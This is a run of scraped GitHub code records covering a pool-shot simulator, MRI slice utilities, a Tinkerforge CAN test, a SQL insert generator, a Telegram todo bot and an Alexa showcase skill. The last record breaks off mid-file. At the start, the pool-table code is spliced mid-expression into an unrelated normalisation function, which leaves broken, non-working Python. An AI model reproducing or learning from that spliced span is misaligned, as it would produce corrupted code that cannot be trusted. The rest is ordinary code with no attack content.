touch the pool table walls\n #real points configs\n C=utils.generate_random_numbers_inside_rectangle(num_real_points,self.pool_table_size,safety_distance)\n T=utils.generate_random_numbers_inside_rectangle(num_real_points,self.pool_table_size,safety_distance)\n index_real = np.arange(num_real_points)\n CT = np.c_[index_real, C, T]\n #pockets configs\n index_pocket = np.arange(1,7)\n pockets = np.c_[index_pocket,self.pockets]\n comb = utils.get_row_combinations_of_two_arrays(CT, pockets)\n deviation_angles=np.random.uniform(-deviation_angle,deviation_angle,size=(number_of_angles,1))#.reshape(-1,1)\n comb = utils.get_row_combinations_of_two_arrays(comb, deviation_angles)\n df=pd.DataFrame({'real_point_id':comb[:,0],\n 'C_x':comb[:,1],\n 'C_y':comb[:,2],\n 'T_x':comb[:,3],\n 'T_y':comb[:,4],\n 'pocket_id':comb[:,5],\n 'P_x':comb[:,6],\n 'P_y':comb[:,7],\n 'deviation_angle':comb[:,8],\n })\n return df\n\n def generate_cue_ball_trajectories(self, df):\n\n C=df[['C_x','C_y']].values\n T=df[['T_x','T_y']].values\n P=df[['P_x','P_y']].values\n X=df[['X_x','X_y']].values\n\n slope=(X[:,1]-C[:,1])/(X[:,0]-C[:,0])\n slope_angle=np.degrees(np.arctan(slope))\n deviated_slope_angle=slope_angle+df['deviation_angle']\n deviated_slope=np.tan(np.radians(deviated_slope_angle))\n deviated_intercept=C[:,1]-deviated_slope*C[:,0]\n df['slope']=deviated_slope\n df['intercept']=deviated_intercept\n\n return df\n\n def compute_Q_actuator(self, df): \n\n C=df[['C_x','C_y']].values\n T=df[['T_x','T_y']].values\n P=df[['P_x','P_y']].values\n slope=df[['slope']].values.ravel()\n intercept=df[['intercept']].values.ravel()\n r=self.ball_radius\n\n X_calculated1,X_calculated2=utils.intersection_circle_line(slope, intercept,r,T)\n\n distCX_calculated1 = np.linalg.norm(C-X_calculated1, axis=1)\n distCX_calculated2 = np.linalg.norm(C-X_calculated2, axis=1)\n\n # we choose the point of intersection that is closest to C\n Cond1 = (distCX_calculated1=b, b, arr)\n arr = (arr-arr.min()) / (arr.max()-arr.min())\n return arr\n\ndef take_slices(folder, suffix, slice_indices=[106,110,114]):\n '''\n This method is used to take slices from every volumes in a folder to create an array\n folder: the folder all images are stored.\n n1: number of the first slice to take from each single image.\n n2: number of the second slice to take from each single image.\n n3: number of the third slice to take from each single image.\n cut1: the percentage to cut from the left-side end in the histogram of the image\n cut2: the percentage to cut from the right-side end in the histogram of the image\n '''\n \n slices=[]\n file_list = [x for x in os.listdir(folder) if x.endswith(suffix)]\n \n for image in tqdm(sorted(file_list)):\n arr = nb.load(os.path.join(folder, image)).get_fdata()\n slice_list = []\n for s in slice_indices:\n slice_list.append(arr[:, s, :])\n slice_array = np.stack(slice_list)\n\n sample = np.swapaxes(np.swapaxes(slice_array, 0, 1), 1, 2)\n slices.append(np.float32(sample))\n slices = np.array(slices)\n return slices\n\ndef take_all_slices(folder, suffix):\n slices=[]\n file_list = [x for x in os.listdir(folder) if x.endswith(suffix)]\n \n for image in tqdm(sorted(file_list)):\n arr = nb.load(os.path.join(folder, image)).get_fdata()\n arr = np.swapaxes(arr, 1, 2)\n\n slices.append(np.float32(arr))\n slices = np.array(slices)\n return slices\n\ndef resample_and_take_all_slices(\n input_dir,\n input_suffix,\n resample_shape = [96, 104, 96],\n subject_limit = None, # In initial runs, smriprep hasn't been completed on all subjects so to not run on everyone\n subject_exclusions = []\n):\n from nibabel.processing import conform\n\n file_list = [x for x in os.listdir(input_dir) if x.endswith(input_suffix)]\n \n slices=[]\n \n if not subject_limit:\n subject_limit = len(file_list)\n\n for image in tqdm(sorted(file_list)[0:subject_limit]):\n img = nb.load(os.path.join(input_dir, image))\n \n conformed_img = conform(img, out_shape = resample_shape)\n arr = conformed_img.get_fdata()\n arr = np.swapaxes(arr, 1, 2)\n\n slices.append(np.float32(arr))\n \n slices = np.array(slices)\n return slices\n\ndef display_100_subject_images(image_dir, file_list, zscored=False):\n plt.figure(figsize=(15, 60))\n \n for i in range(100):\n img = nb.load(os.path.join(image_dir, file_list[i]))\n img_arr = nb.as_closest_canonical(img).get_fdata()\n\n plt.subplot(20, 5, i+1)\n plt.axis('off')\n if zscored:\n plt.imshow(img_arr[:, 110, :].T, cmap='gray', origin='lower', vmin=-12, vmax=12)\n else:\n plt.imshow(img_arr[:, 110, :].T, cmap='gray', origin='lower')\n plt.title('subject: ' + file_list[i].split('_')[0])\n\n plt.show()\n \ndef display_100_subject_images_npy(npy_path, target_slice = 110, zscored=False):\n from scipy.ndimage import rotate\n \n plt.figure(figsize=(15, 60))\n img_data = np.load(npy_path)\n \n for i in range(100):\n plt.subplot(20, 5, i+1)\n plt.axis('off')\n if zscored:\n plt.imshow(img_data[i , :, target_slice, :], cmap='gray', vmin=-12, vmax=12)\n else:\n plt.imshow(img_data[i , :, target_slice, :], cmap='gray')\n plt.title('subject: {:04d}'.format(i))\n\n plt.show()","repo_name":"chris-lew/predicting_ATN_markers_using_MRI","sub_path":"img_utils.py","file_name":"img_utils.py","file_ext":"py","file_size_in_byte":8355,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"34351152815","text":"def substrlen(s):\n last_idx = {}\n max_len = 0\n start_idx = 0\n\n for i in range(0, len(s)):\n if s[i] in last_idx:\n start_idx = max(start_idx, last_idx[s[i]] + 1)\n max_len = max(max_len, i - start_idx + 1)\n last_idx[s[i]] = i\n\n return max_len\n\nprint(substrlen('abcabcbb'))\n","repo_name":"arpi21/tumolabs_dealeronduty","sub_path":"Day 1/Assesment 2/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":317,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"25989981747","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nHOST = \"localhost\"\nPORT = 4223\nUID = \"2hghdk\" # Change XYZ to the UID of your CAN Bricklet\n\nfrom tinkerforge.ip_connection import IPConnection\nfrom tinkerforge.bricklet_can_v2 import BrickletCANV2\n\ndef cb_frame_read(frame_type, identifier, data):\n print(frame_type, identifier, data)\n\nif __name__ == \"__main__\":\n ipcon = IPConnection() # Create IP connection\n can = BrickletCANV2(UID, ipcon) # Create device object\n\n ipcon.connect(HOST, PORT) # Connect to brickd\n # Don't use device before ipcon is connected\n\n can.register_callback(can.CALLBACK_FRAME_READ, cb_frame_read)\n can.set_frame_read_callback_configuration(True)\n\n raw_input(\"Press key to exit\\n\")\n can.set_frame_read_callback_configuration(False)\n ipcon.disconnect()\n","repo_name":"Tinkerforge/can-v2-bricklet","sub_path":"software/tests/read_callback.py","file_name":"read_callback.py","file_ext":"py","file_size_in_byte":805,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"35"} +{"seq_id":"75308816420","text":"import glob\nimport sys\nfrom string import Template \n\ndef format_date(pdte):\n pdte= pdte.replace(\"\\\"\", \"\")\n s = pdte.split(\" \")\n if(len(s) < 2):\n return None\n dte = s[0].split(\"/\")\n tme = s[1]\n day, month, yyyy = dte\n frmt_dt = yyyy + \"-\" + month + \"-\" + day + \" \" + tme\n return frmt_dt\n\n\ndef main(data_dir, database):\n sql_template = Template(\"\"\"INSERT INTO RAW_DATA (pickup_date_time,lat, lon, base) VALUES('$PICKUP_DT', $LAT, $LON, $BASE);\"\"\")\n print(\"USE uber;\")\n data_files_path = glob.glob(data_dir+ \"*.csv\")\n for path in data_files_path:\n with open(path, 'r') as f:\n next(f)\n for line in f:\n fields = line.split(\",\")\n if len(fields) < 4:\n continue\n pickup_dt = format_date(fields[0])\n if pickup_dt is None:\n continue \n lat = fields[1]\n lon = fields[2]\n base = fields[3]\n insert_sql = sql_template.substitute(PICKUP_DT = pickup_dt,\n LAT=lat,\n LON=lon,\n BASE=base)\n print(insert_sql)\n\n \nif __name__ == \"__main__\":\n data_directory =sys.argv[1]\n database = sys.argv[2]\n main(data_directory, database)\n","repo_name":"epocolis/tool_box","sub_path":"scripts/generate_raw_data_insert.py","file_name":"generate_raw_data_insert.py","file_ext":"py","file_size_in_byte":1320,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"28217987702","text":"# Uczestnik funduszu powierniczegp - niepoprawna wersja\n# Demonstruje konwersje typow\n\nprint(\n\"\"\"\n Uczestnik funduszu powierniczego\n \nSumuje Twoje miesieczne wydatki, zeby Twoj fundusz powierniczy sie nie wyczerpal\n(bo wtedy bylbys zmuszony do podjecia prawdziwej pracy).\n\nWprowadz swoje wymagane miesieczne koszty.\nPoniewaz jestes bogaty, zignoruj grosze i swoje kwoty podaj w pelnych zlotych.\n\n\"\"\"\n)\n\ncar = input(\"Serwi Mercedesa: \")\ncar = int(car)\n\nrent = int(input(\"Apartament w Srodmiesciu: \"))\njet = int(input(\"Wynajem prywatnego samolotu: \"))\ngifts = int(input(\"Podarunki: \"))\nfood = int(input(\"Obiady w restauracjach: \"))\nstaff = int(input(\"Personel (sluzba domowa, kucharz, kierowca, asystent): \"))\nguru = int(input(\"Osobisty guru i coach: \"))\ngames = int(input(\"Gry komputerowe: \"))\n\ntotal = car + rent + jet + gifts + food + staff + guru + games\n\nprint(\"\\nOgolem:\", total)\n\ninput(\"\\n\\nAby zakonczyc program, nacisnij klawisz ENTER.\")","repo_name":"PiotrKwiatosz/Learning-programming","sub_path":"Python Programming for the Absolute Beginner/r02/fundusz_powierniczy_dobry.py","file_name":"fundusz_powierniczy_dobry.py","file_ext":"py","file_size_in_byte":974,"program_lang":"python","lang":"pl","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"17134071356","text":"import re\nfrom datetime import datetime\n\nfrom pymongo.errors import DuplicateKeyError\n\nfrom anastasia import mongoda\nfrom anastasia.telegramcalendar import create_calendar\n\nfrom anastasia.loghelper import log\n\n\nclass Todo:\n # contains the month printed by addtodo and the self.todos content\n def __init__(self):\n log.info(mongoda.getDB())\n self.current_shown_dates = {}\n self.todos = mongoda.getDB().todos\n\n @staticmethod\n def usage():\n return \"/todo list all todo\\n\" \\\n \"/todo [-d id] delete a todo\"\n\n def clean_list(self,chat_id):\n self.todos[chat_id].remove({\"date\": {\"$lt\": datetime.now()}})\n\n def all_to_do_list(self, chat_id):\n self.clean_list(chat_id)\n st = \"\"\n ct = 1\n for todo in self.todos[chat_id].find().sort(\"date\"):\n st += str(todo[\"date\"].strftime(\"%d/%m\")) + \" (\" + str(ct) + \") : \" + todo[\"task\"] + \"\\n\"\n ct += 1\n return st\n\n def delete_todo(self, chat_id, id_todo):\n self.todos[chat_id].remove(self.todos[chat_id].find().sort(\"date\")[int(id_todo) - 1])\n\n def add_todo(self, chat_id, message_id, date, task):\n todo = {\n \"_id\" : message_id,\n \"task\": task,\n \"date\": date\n }\n id_todo = self.todos[chat_id].insert_one(todo)\n log.info(\"insert id : \" + str(id_todo))\n return todo\n\n def give_add_todo(self, bot, update, args):\n now = datetime.now() # Current date\n chat_id = update.message.chat.id\n date = (now.year, now.month)\n self.current_shown_dates[chat_id] = [date, ' '.join(args)] # Saving the current date in a dict\n markup = create_calendar(now.year, now.month)\n bot.send_message(update.message.chat.id, \"Choisir une date\", reply_markup=markup)\n\n def todo_callback(self, bot, update):\n if update.callback_query.data == \"next-month\":\n self.next_month(bot, update)\n elif update.callback_query.data == \"previous-month\":\n self.previous_month(bot, update)\n elif update.callback_query.data == \"ignore\":\n bot.answer_callback_query(update.callback_query.id, text=\"\")\n else:\n self.choose_day(bot, update)\n\n def choose_day(self, bot, update):\n ma = re.match(\"calendar-day-([0-9]+)\", update.callback_query.data)\n if ma is not None:\n chat_id = update.callback_query.message.chat.id\n date = datetime.strptime(\n str(self.current_shown_dates[chat_id][0][0]) + str(self.current_shown_dates[chat_id][0][1]),\n '%Y%m').replace(day=int(ma.group(1)))\n try:\n todo = self.add_todo(update.callback_query.message.chat_id,update.callback_query.message.message_id, date, self.current_shown_dates[chat_id][1],bot)\n except DuplicateKeyError:\n log.info(\"duplicatekey for : \" + str(todo))\n # erase calendar\n bot.edit_message_text(\"todo existant\",\n update.callback_query.from_user.id, update.callback_query.message.message_id,\n reply_markup=\"\")\n log.info(\"add todo : \" + str(todo))\n bot.edit_message_text(str(todo[\"date\"].strftime(\"%d/%m\")) + \" : \" + todo[\"task\"],\n update.callback_query.from_user.id, update.callback_query.message.message_id,\n reply_markup=\"\")\n\n def previous_month(self, bot, update):\n chat_id = update.callback_query.message.chat.id\n saved_date = self.current_shown_dates.get(chat_id)[0]\n if saved_date is not None:\n year, month = saved_date\n month -= 1\n if month < 1:\n month = 12\n year -= 1\n date = (year, month)\n self.current_shown_dates[chat_id][0] = date\n markup = create_calendar(year, month)\n bot.edit_message_text(\"Choisir une date\", update.callback_query.from_user.id,\n update.callback_query.message.message_id, reply_markup=markup)\n bot.answer_callback_query(update.callback_query.id, text=\"\")\n else:\n # Do something to inform of the error\n pass\n\n def next_month(self, bot, update):\n chat_id = update.callback_query.message.chat.id\n saved_date = self.current_shown_dates.get(chat_id)[0]\n if saved_date is not None:\n year, month = saved_date\n month += 1\n if month > 12:\n month = 1\n year += 1\n date = (year, month)\n self.current_shown_dates[chat_id][0] = date\n markup = create_calendar(year, month)\n bot.edit_message_text(\"Please, choose a date\", update.callback_query.from_user.id,\n update.callback_query.message.message_id, reply_markup=markup)\n bot.answer_callback_query(update.callback_query.id, text=\"\")\n else:\n # Do something to inform of the error\n pass\n\n def give_todo(self, bot, update, args):\n if len(args) == 0:\n log.info(\"Give the todolist\")\n bot.sendMessage(chat_id=update.message.chat_id, text=self.all_to_do_list(update.message.chat_id))\n elif len(args) == 2 and args[0] == \"-d\":\n log.info(\"Delete \" + args[1] + \" to the todolist\")\n self.delete_todo(update.message.chat_id, args[1])\n else:\n log.info(\"Bad format command\")\n bot.sendMessage(chat_id=update.message.chat_id, text=self.usage())\n","repo_name":"Anastadev/anastasia","sub_path":"anastasia/todolist.py","file_name":"todolist.py","file_ext":"py","file_size_in_byte":5656,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"35"} +{"seq_id":"544534812","text":"# -*- coding: utf-8 -*-\n\"\"\"Simple fact sample app.\"\"\"\n\nimport random\nimport logging\n\nfrom ask_sdk_core.skill_builder import SkillBuilder\nfrom ask_sdk_core.dispatch_components import (\n AbstractRequestHandler, AbstractExceptionHandler,\n AbstractRequestInterceptor, AbstractResponseInterceptor)\nfrom ask_sdk_core.utils import is_request_type, is_intent_name, get_slot_value, get_slot\nfrom ask_sdk_core.handler_input import HandlerInput\n\nfrom ask_sdk_model.ui import SimpleCard\nfrom ask_sdk_model import Response\nfrom ask_sdk_model.dialog import (\n ElicitSlotDirective, DelegateDirective)\nfrom ask_sdk_model import (\n Response, IntentRequest, DialogState, SlotConfirmationStatus, Slot)\nfrom ask_sdk_model.slu.entityresolution import StatusCode\nfrom ask_sdk_model.intent import Intent\nfrom enum import Enum\nimport os\nimport pyrebase\nimport requests\nimport random\n# =========================================================================================================================================\n# TODO: The items below this comment need your attention.\n# =========================================================================================================================================\nEXCEPTION_MESSAGE = \"Sorry. I cannot help you with that.\"\n\nLAUNCH_MESSAGE = \"Welcome to showcaser.\"\nGOODBYE_MESSAGE = \"Alright! Goodbye!\"\nREQUEST_COURSE_MESSAGE = \"Which course do you want?\"\nREQUEST_TAG_MESSAGE = \"What type of projects are you looking for?\"\nHELP_COURSE_MESSAGE = \"There is IMGD, IT, FI, ISF, and A3DA.\"\nHELP_TAG_MESSAGE = \"There are projects ranging from programming, to design.\"\n\n# =========================================================================================================================================\n# Editing anything below this line might break your skill.\n# =========================================================================================================================================\n\nsb = SkillBuilder()\nlogger = logging.getLogger(__name__)\nlogger.setLevel(logging.DEBUG)\n\nconfig = {\n \"apiKey\" : os.getenv(\"apiKey\"),\n \"projectId\" : os.getenv(\"projectId\"),\n \"authDomain\" : os.getenv(\"authDomain\"),\n \"storageBucket\": os.getenv(\"storageBucket\"),\n \"databaseURL\": \"\",\n}\n\nfirebase = pyrebase.initialize_app(config)\nauth = firebase.auth()\n\nclass SessionManager:\n def __init__(self, *args, **kwargs):\n return super().__init__(*args, **kwargs)\n \n def set_session(self, handler_input):\n self.session = get_session(handler_input)\n \n def is_confirming_project_search(self):\n return self.session['expecting']['projectSearch'] is True\n \nsessionManager = SessionManager()\n\n\nclass SuggestionType(Enum):\n COURSE = \"course\"\n TAG = \"tag\"\n\n def __repr__(self):\n return self.value\n \n def __eq__(self, other):\n return other == self.value\n\n\ndef GeneratePayload(tag, course):\n payload = {\n \"title\": \"\",\n\t\"description\": \"\",\n\t\"tags\": [tag],\n\t\"course\": [course]\n }\n if tag == \"all\" or tag is None:\n payload[\"tags\"] = []\n if course == \"all\" or course is None:\n payload[\"course\"] = []\n\n return payload\ndef FormHeader(idToken):\n header = {\n 'Authorization' : 'Bearer ' + idToken,\n 'Content-Type' : 'application/json'\n }\n return header\n\ndef get_expecting_type(handler_input):\n session = get_session(handler_input)\n if session['expecting']['projectSearch'] is True:\n return \"PROJECT_SEARCH\"\n\n@sb.request_handler(can_handle_func = is_request_type(\"LaunchRequest\"))\ndef LaunchHandler(handler_input):\n user = auth.sign_in_with_email_and_password(os.getenv(\"firebase_email\"), os.getenv(\"firebase_password\"))\n idToken = user['idToken']\n session = get_session(handler_input)\n session['idToken'] = user['idToken']\n session['isRetrieving'] = False\n session['tag'] = None\n session['course'] = None\n session['fallbackCount'] = 0\n session['expecting'] = {\n 'projectSearch' : False,\n 'suggestion': False\n }\n session['suggestion'] = {\n 'type': \"\",\n 'value': \"\",\n 'count': 0\n }\n\n return elicit_slot(\"ProjectType\", \"RetrieveProjectsIntent\", handler_input, REQUEST_TAG_MESSAGE, LAUNCH_MESSAGE)\n\ndef get_resolved_value(slot):\n if slot is None:\n return None\n\n resolution = slot.resolutions.resolutions_per_authority[0]\n code = resolution.status.code\n if code == StatusCode.ER_SUCCESS_NO_MATCH:\n return None\n elif code == StatusCode.ER_SUCCESS_MATCH:\n value = resolution.values[0].value.name\n return value\n logger.info(\"Value: {}, code: {}\".format(value, code))\n\ndef get_session(handler_input):\n return handler_input.attributes_manager.session_attributes\n\ndef elicit_slot(slot_name, intent_name, handler_input, message_body, suffix):\n return handler_input.response_builder.speak(f\"{suffix} {message_body}\").add_directive(\n ElicitSlotDirective(Intent(name=intent_name), slot_to_elicit=slot_name)\n ).response\n\n\n@sb.request_handler(can_handle_func = is_intent_name(\"RetrieveProjectsIntent\"))\ndef GetTypeHandler(handler_input):\n \"\"\" Handler for getting Project Type \"\"\"\n tag = get_slot(handler_input, \"ProjectType\")\n session = get_session(handler_input)\n logger.info(\"ProjectType slot: {}\".format(tag))\n\n if tag.value is None:\n return handler_input.response_builder.speak(\n \"Sorry I did not get that. What type of projects do you want?\").add_directive(\n ElicitSlotDirective(slot_to_elicit=\"ProjectType\")\n ).response\n else:\n session['tag'] = tag.value\n return ProjectHandler(handler_input, \"\")\n \n@sb.request_handler(can_handle_func = is_intent_name(\"GetCourseIntent\"))\ndef GetCourseHandler(handler_input):\n \"\"\" Handler for getting Course \"\"\"\n course_slot = get_slot(handler_input, \"Course\")\n session = get_session(handler_input)\n if course_slot.value is None or get_resolved_value(course_slot) is None:\n return handler_input.response_builder.speak(\n \"Sorry, I did not get that. What course do you want?\").add_directive(\n ElicitSlotDirective(slot_to_elicit=\"Course\")\n ).response\n else:\n value = get_resolved_value(course_slot)\n session['course'] = value\n return ProjectHandler(handler_input, \"\")\n \n@sb.request_handler(can_handle_func = is_intent_name(\"CourseOnlyIntent\"))\ndef GetCourseOnlyHandler(handler_input):\n return __GetCourseOnlyHandler(handler_input)\n\ndef __GetCourseOnlyHandler(handler_input):\n session = get_session(handler_input)\n course = get_resolved_value(get_slot(handler_input, \"Course\"))\n response = requests.post(\"https://backend.showcasr.yadunut.com/live\", json=GeneratePayload(\"all\", course), headers=FormHeader(session['idToken']))\n message = \"\"\n if response.status_code == 401:\n message = \"Request Error! Unauthorized\"\n else:\n session['course'] = None\n json = response.json()\n project_count = json['projectCount']\n if course == \"A3DA\":\n course = \"a. 3. d. a.\"\n if project_count == 0:\n message = f\"Projects from the {course} course was not found\"\n else:\n if \"all\" in course:\n message = f'Here are all projects from all of the courses. There is a total of {project_count} project'\n else:\n message = f'Here are all projects from the {course} course. There is a total of {project_count} project'\n if project_count > 1:\n message += \"s\"\n message += \".\"\n message += \" Would you like to retrieve other kinds of projects?\"\n session['expecting']['projectSearch'] = True\n return handler_input.response_builder.speak(message).set_should_end_session(False).response\n\n\n\ndef ProjectHandler(handler_input, suffix):\n session = get_session(handler_input)\n tag, course = session['tag'], session['course']\n status = get_course_and_tag_status(handler_input)\n if status == NO_TAG_NO_COURSE:\n return handler_input.response_builder.speak(f\"{suffix} So, what kind of projects do you want?\").add_directive(\n ElicitSlotDirective(updated_intent=Intent(name=\"RetrieveProjectsIntent\"),slot_to_elicit=\"ProjectType\")\n ).response\n if status == HAS_TAG_NO_COURSE:\n message = f\"{suffix} So, from which course do you want {tag} projects from?\"\n return handler_input.response_builder.speak(\n message).add_directive(\n ElicitSlotDirective(updated_intent=Intent(name=\"GetCourseIntent\"),slot_to_elicit=\"Course\")\n ).response\n elif status == NO_TAG_HAS_COURSE:\n return __GetCourseOnlyHandler(handler_input)\n elif status == HAS_TAG_HAS_COURSE:\n message = \"\"\n response = requests.post(\"https://backend.showcasr.yadunut.com/live\", json=GeneratePayload(tag, course), headers=FormHeader(session['idToken']))\n if response.status_code == 401:\n message = \"Request Error! Unauthorized\"\n else:\n session['tag'] = None\n session['course'] = None\n json = response.json()\n project_count = json['projectCount']\n if course == \"A3DA\":\n course = \"a. 3. d. a.\"\n if project_count == 0:\n if \"all\" in course:\n message = f\"{tag} projects from all of the courses were not found\"\n else:\n message = f\"{tag} projects from the {course} course was not found\"\n else:\n if \"all\" in course:\n message = f'Here are {tag} projects from all of the courses. There is a total of {project_count} project'\n else:\n message = f'Here are {tag} projects from the {course} course. There is a total of {project_count} project'\n if project_count > 1:\n message += \"s\"\n message += \". Would you like to retrieve other kinds of projects?\"\n session['expecting']['projectSearch'] = True\n\n return handler_input.response_builder.speak(message).set_should_end_session(False).response\n\nNO_TAG_NO_COURSE = 0\nHAS_TAG_HAS_COURSE = 1\nNO_TAG_HAS_COURSE = 2\nHAS_TAG_NO_COURSE = 3\n\ndef get_course_and_tag_status(handler_input):\n session = get_session(handler_input)\n tag, course = session['tag'], session['course']\n if tag is not None and course is None:\n return HAS_TAG_NO_COURSE\n elif tag and course:\n return HAS_TAG_HAS_COURSE\n elif tag is None and course is not None:\n return NO_TAG_HAS_COURSE\n elif tag is None and course is None:\n return NO_TAG_NO_COURSE\n\n@sb.request_handler(can_handle_func = is_intent_name(\"DisplayCountIntent\"))\ndef GetDisplayCountHandler(handler_input):\n attr = handler_input.attributes_manager.session_attributes\n project_count = attr['projectCount']\n res = f'Total number of projects on display is {project_count}'\n\n return handler_input.response_builder.speak(res).set_should_end_session(False).response\n\n@sb.request_handler(can_handle_func = lambda x: (is_intent_name(\"AMAZON.StopIntent\")(x) or is_intent_name(\"AMAZON.CancelIntent\")(x)))\ndef StopHandler(handler_input):\n session = get_session(handler_input)\n status = get_course_and_tag_status(handler_input)\n if session['expecting']['suggestion']:\n session['expecting']['suggestion'] = False\n handler_input.attributes_manager.session_attributes = session\n return handler_input.response_builder.speak(\"Suggestion cancelled. What kind of projects would you like?\").set_should_end_session(False).response\n elif status == NO_TAG_NO_COURSE:\n return handler_input.response_builder.speak(GOODBYE_MESSAGE).set_should_end_session(True).response\n elif status == HAS_TAG_NO_COURSE or status == NO_TAG_HAS_COURSE:\n session['course'] = None\n session['tag'] = None\n return handler_input.response_builder.speak(\"Retrieving cancelled. What kind of projects would you like?\").set_should_end_session(False).response\n\n\n\n@sb.request_handler(can_handle_func = is_intent_name(\"SpecificCourseHelp\"))\ndef CourseHelpHandler(handler_input):\n course_slot = get_slot(handler_input, \"Course\")\n if course_slot.value is None:\n return ProjectHandler(handler_input, \"There is IMGD, IT, FI, ISF, and A3DA.\")\n course = get_resolved_value(course_slot)\n message = \"\"\n if course == \"ISF\":\n message = \"i. s. f. is about cybersecurity. \"\n elif course == \"FI\":\n message = \"f. i. is about finance. \"\n elif course == \"IT\":\n message = \"i. t. is about programming. \"\n elif course == \"A3DA\":\n message = \"a. three. d. a. is about animation. \"\n elif course == \"IMGD\":\n message = \"i. m. g. d. is about game design. \"\n return ProjectHandler(handler_input, message)\n\n\n@sb.request_handler(can_handle_func = is_intent_name(\"AMAZON.HelpIntent\"))\ndef HelpIntentHandler(handler_input):\n return __HelpIntentHandler(handler_input)\n \ndef __HelpIntentHandler(handler_input):\n \"\"\"Handler for Help Intent.\"\"\"\n session = get_session(handler_input)\n tag, course = session['tag'], session['course']\n status = get_course_and_tag_status(handler_input)\n if status == HAS_TAG_NO_COURSE:\n return elicit_slot(\"Course\", \"GetCourseIntent\", handler_input, REQUEST_COURSE_MESSAGE, \"There is IMGD, IT, FI, ISF, and a. 3. d. a. courses.\")\n else:\n return elicit_slot(\"ProjectType\", \"RetrieveProjectsIntent\", handler_input, REQUEST_TAG_MESSAGE, \"There are projects ranging from programming to design.\")\n \n\n@sb.request_handler(can_handle_func = is_intent_name(\"ListCoursesIntent\"))\ndef ListCoursesHandler(handler_input):\n return __ListCoursesHandler(handler_input)\n \ndef __ListCoursesHandler(handler_input):\n return ProjectHandler(handler_input, \"There is IMGD, IT, FI, ISF, and A3DA.\")\n\n@sb.request_handler(can_handle_func = is_intent_name(\"ListProjectsIntent\"))\ndef ListProjectsHandler(handler_input):\n return __ListProjectsHandler(handler_input)\n\ndef __ListProjectsHandler(handler_input):\n return ProjectHandler(handler_input, \"There are projects regarding gaming, programming or even design.\")\n\n\n\n@sb.request_handler(can_handle_func = is_intent_name(\"AutoSuggestionIntent\"))\ndef AutoSuggestionHandler(handler_input):\n session = get_session(handler_input)\n suggestionCount = session['suggestion']['count']\n if suggestionCount == 0:\n return __GetSuggestionHandler(handler_input)\n elif suggestionCount >= 1:\n return __GetSuggestionHandler(handler_input, auto_choose=True)\n\n\n@sb.request_handler(can_handle_func = is_intent_name(\"GetSuggestionIntent\"))\ndef GetSuggestionHandler(handler_input):\n return __GetSuggestionHandler(handler_input)\n\ndef __GetSuggestionHandler(handler_input, auto_choose=False, suffix=\"\"):\n session = get_session(handler_input)\n status = get_course_and_tag_status(handler_input)\n courses = [\"ISF\", \"IMGD\", \"FI\", \"IT\"]\n tags = [\"programming\", \"gaming\", \"design\"]\n chosen_course = random.choice(courses)\n chosen_tag = random.choice(tags)\n session['expecting']['suggestion'] = True\n\n session['suggestion']['count'] += 1\n if status == HAS_TAG_NO_COURSE:\n message = f\"{suffix} Would you like to search for {session['tag']} projects from the {chosen_course} course?\"\n if auto_choose:\n session['course'] = session['suggestion']['value']\n session['suggestion']['count'] = 0\n session['suggestion']['type'] = ''\n session['suggestion']['value'] = ''\n return ProjectHandler(handler_input, f\"Okay, I chose the {chosen_course} course for you.\")\n session['suggestion']['type'] = SuggestionType.COURSE.value\n session['suggestion']['value'] = f\"{chosen_course}\"\n return handler_input.response_builder.speak(message).set_should_end_session(False).response\n elif status == NO_TAG_NO_COURSE:\n message = f\"{suffix} Would you like to search for {chosen_tag} projects\"\n if auto_choose:\n session['tag'] = session['suggestion']['value']\n session['suggestion']['count'] = 0\n session['suggestion']['type'] = ''\n session['suggestion']['value'] = ''\n return ProjectHandler(handler_input, f\"Okay, I chose {chosen_tag} projects for you.\")\n session['suggestion']['type'] = SuggestionType.TAG.value\n session['suggestion']['value'] = f\"{chosen_tag}\"\n return handler_input.response_builder.speak(message).set_should_end_session(False).response\n\n@sb.request_handler(can_handle_func = is_intent_name(\"AMAZON.FallbackIntent\"))\ndef FallbackIntentHandler(handler_input):\n session = get_session(handler_input)\n fallbackCount = session['fallbackCount']\n if fallbackCount == 1:\n status = get_course_and_tag_status(handler_input)\n if status == HAS_TAG_NO_COURSE:\n return __ListCoursesHandler(handler_input)\n else:\n return __ListProjectsHandler(handler_input)\n elif fallbackCount == 2:\n return __GetSuggestionHandler(handler_input, suffix=\"I can't do that for you. However I can help suggest.\")\n elif fallbackCount >= 3:\n return handler_input.response_builder.speak(\"This is out of my domain. Goodbye\").response\n return __FallbackIntentHandler(handler_input, \"I did not get that.\")\n\ndef __FallbackIntentHandler(handler_input, suffix):\n \"\"\"Handler for Fallback Intent.\n AMAZON.FallbackIntent is only available in en-US locale.\n This handler will not be triggered except in that locale,\n so it is safe to deploy on any locale.\n \"\"\"\n session = get_session(handler_input)\n status = get_course_and_tag_status(handler_input)\n fallbackCount = session['fallbackCount']\n\n session['fallbackCount'] += 1\n handler_input.attributes_manager.session_attributes = session\n if status == HAS_TAG_NO_COURSE:\n return elicit_slot(\"Course\", \"GetCourseIntent\", handler_input, REQUEST_COURSE_MESSAGE, suffix)\n else:\n return handler_input.response_builder.speak(f\"{suffix} What kind of projects would you like?\").add_directive(\n ElicitSlotDirective(updated_intent=Intent(name=\"RetrieveProjectsIntent\"),slot_to_elicit=\"ProjectType\")\n ).response\n\n@sb.request_handler(can_handle_func = is_intent_name(\"AMAZON.YesIntent\"))\ndef YesHandler(handler_input):\n session = get_session(handler_input)\n if session['expecting']['projectSearch']:\n session['expecting']['projectSearch'] = False\n handler_input.attributes_manager.session_attributes = session\n return ProjectHandler(handler_input, \"\")\n elif session['expecting']['suggestion']:\n session['expecting']['suggestion'] = False\n if session['suggestion']['type'] == SuggestionType.COURSE.value:\n session['course'] = session['suggestion']['value']\n elif session['suggestion']['type'] == SuggestionType.TAG.value:\n session['tag'] = session['suggestion']['value']\n session['suggestion']['count'] = 